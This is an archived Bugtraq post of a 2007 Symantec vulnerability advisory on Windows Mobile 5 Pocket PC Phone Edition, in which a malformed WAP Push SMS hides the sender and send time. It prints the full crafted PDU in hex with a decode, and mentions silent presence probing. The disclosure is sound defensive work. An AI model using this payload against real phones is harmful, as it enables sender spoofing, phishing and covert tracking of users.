SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: SYMSA-2007-011: Microsoft WM5 PocketPC Phone Ed SMS Handler Issue
From: research@xxxxxxxxxxxx
Date: 17 Oct 2007 19:56:11 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1



                     Symantec Vulnerability Research
                     http://www.symantec.com/research
                           Security Advisory

   Advisory ID: SYMSA-2007-011
Advisory Title: Microsoft Windows Mobile 5 PocketPC Phone Edition
                SMS Handler Issue With Regard to Malformed WAP Push
                Messages Hiding Source
        Author: Ollie Whitehouse / ollie_whitehouse@xxxxxxxxxxxx
  Release Date: 17-10-2007
   Application: Microsoft Windows Mobile 5 PocketPC
      Platform: Windows
      Severity: Information Disclosure
 Vendor status: Vendor Reviewed
    CVE Number: CVE-2007-5493
     Reference: http://www.securityfocus.com/bid/26019


Overview:

  Microsoft Windows Mobile 6 is the latest version of Microsoft's
  mobile operating system. Designed for small embedded devices,
  Windows Mobile is the CE feature set designed for PDA's and mobile
  telephones. Microsoft Windows Mobile comes in three distinct
  flavors, Pocket PC, Pocket PC Phone Edition and SmartPhone

  A vulnerability has been discovered in the SMS handler on
  Windows Mobile 2005 Pocket PC Phone edition which means the sender
  of the original SMS message can be masked from the recipient when
  sent a specifically crafted WAP PUSH message.


Details:

  Symantec discovered that a slightly malformed WAP PUSH message
  could be used to hide the originating sender of the message on
  Windows Mobile 2005. The original PDU can be seen in [1]. The
  following PDU will cause the Pocket PC Phone edition SMS handler
  to incorrectly decode the PDU. The result of which is both the
  sending telephone number and the sending time are incorrect.

 [1] PDU (Line wrapped)
  079144775810065051220C914477619269060004A7600605040B8423F025060803AE81EA
  AF82B48401056A0045C6070D0373796D616E7465630085010353796D616E7465630D0D62
  756C6B534D532028556E726567697374657265642056657229202D204C6F6769784D6F62
  696C652E636F6D000101

  The decode of the PDU can be seen in [2]. This decode was achieved
  with PDUSpy from http://www.nobbi.com/pduspy.htm. When this message
  is received by a SmartPhone it will be silently discarded, which
  can also be useful to an attacker who wishes to ascertain if a
  cellphone is on without alerting the user through SMS delivery
  receipts.

  [2] Decode of PDU from PDUSpy

  PDU LENGTH IS 118 BYTES
  ADDRESS OF DELIVERING SMSC
    NUMBER IS : +447785016005
    TYPE OF NR. : International
    NPI : ISDN/Telephone (E.164/163)

  MESSAGE HEADER FLAGS
    MESSAGE TYPE : SMS SUBMIT
    REJECT DUPLICATES : NO
    VALIDITY PERIOD : RELATIVE
    REPLY PATH : NO
    USER DATA HEADER : PRESENT
    REQ. STATUS REPORT : NO
    MSG REFERENCE NR. : 34 (0x22)

  DESTINATION ADDRESS
    NUMBER IS : +447716299660
  TYPE OF NR. : International
    NPI : ISDN/Telephone (E.164/163)

  PROTOCOL IDENTIFIER (0x00)
    MESSAGE ENTITIES : SME-to-SME
    PROTOCOL USED : Implicit / SC-specific

   DATA CODING SCHEME (0x04)
    AUTO-DELETION : OFF
    COMPRESSION : OFF
    MESSAGE CLASS : NONE
    ALPHABET USED : 8bit data

   VALIDITY OF MESSAGE : 24.0 hrs

   USER DATA PART OF SM
    USER DATA LENGTH : 96 octets
    UDH LENGTH : 6 octets
    UDH : 05 04 0B 84 23 F0
    UDH ELEMENTS : 05 - Appl. port addressing 16bit
       4 (0x04) Bytes Information Element
         09200 : SOURCE port is: allocated by IANA
        02948 : DESTINATION port is: allocated by IANA
     --- DATA ----------------------
       05 04 0B 84 23 F0
       USER DATA (TEXT) : %®?ê¯?´?jEÆ
     symantec?Symantec
       bulkSMS (Unregistered Ver) -
       LogixMobile.com



Vendor Response:

  A vulnerability has been discovered in the SMS handler. If a
  malicious message with no sender was received by a user on their
  device, the user may be enticed in taking action or clicking the
  URI that could lead to a second order attack.
  
  Mitigating Factors: By default Windows mobile device policy require
  SI messages to be authenticated. The  Mobile Operators have the
  ability to  change the policy to not requiring authentication in
  order for  3rd party ring tones and other SI messages.

  Microsoft will look into a different architecture in future versions.


Recommendation:

  Contact your mobile operator to ensure the proper policy is set on
  your device.


Common Vulnerabilities and Exposures (CVE) Information:

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.


  CVE-2007-5493

- -------Symantec Vulnerability Research Advisory Information-------

For questions about this advisory, or to report an error:
research@xxxxxxxxxxxx

For details on Symantec's Vulnerability Reporting Policy: 
http://www.symantec.com/research/Symantec-Responsible-Disclosure.pdf

Symantec Vulnerability Research Advisory Archive: 
http://www.symantec.com/research/  

Symantec Vulnerability Research GPG Key:
http://www.symantec.com/research/Symantec_Vulnerability_Research_GPG.asc

- -------------Symantec Product Advisory Information-------------

To Report a Security Vulnerability in a Symantec Product:
secure@xxxxxxxxxxxx 

For general information on Symantec's Product Vulnerability 
reporting and response:
http://www.symantec.com/security/

Symantec Product Advisory Archive: 
http://www.symantec.com/avcenter/security/SymantecAdvisories.html

Symantec Product Advisory PGP Key:
http://www.symantec.com/security/Symantec-Vulnerability-Management-Key.asc

- ---------------------------------------------------------------

Copyright (c) 2007 by Symantec Corp.
Permission to redistribute this alert electronically is granted 
as long as it is not edited in any way unless authorized by 
Symantec Consulting Services. Reprinting the whole or part of 
this alert in any medium other than electronically requires 
permission from research@xxxxxxxxxxxxx

Disclaimer
The information in the advisory is believed to be accurate at the 
time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS 
condition. There are no warranties with regard to this information. 
Neither the author nor the publisher accepts any liability for any 
direct, indirect, or consequential loss or damage arising from use 
of, or reliance on, this information.

Symantec, Symantec products, and Symantec Consulting Services are 
registered trademarks of Symantec Corp. and/or affiliated companies 
in the United States and other countries. All other registered and 
unregistered trademarks represented in this document are the sole 
property of their respective companies/owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)

iD8DBQFHFlXzuk7IIFI45IARAk+NAKCk8GGaxtg7Z9g0zBTX8BzHt9LPkwCgwOeD
1qhcVHQ07YHEdgF0zUP81/k=
=pFeF
-----END PGP SIGNATURE-----

Prev by Date: [ MDKSA-2007:199 ] - Updated phpMyAdmin packages fix multiple vulnerabilities
Next by Date: SQL Injection Flaw in Oracle Workspace Manager
Previous by thread: [ MDKSA-2007:199 ] - Updated phpMyAdmin packages fix multiple vulnerabilities
Next by thread: SQL Injection Flaw in Oracle Workspace Manager
Index(es):
- Date
- Thread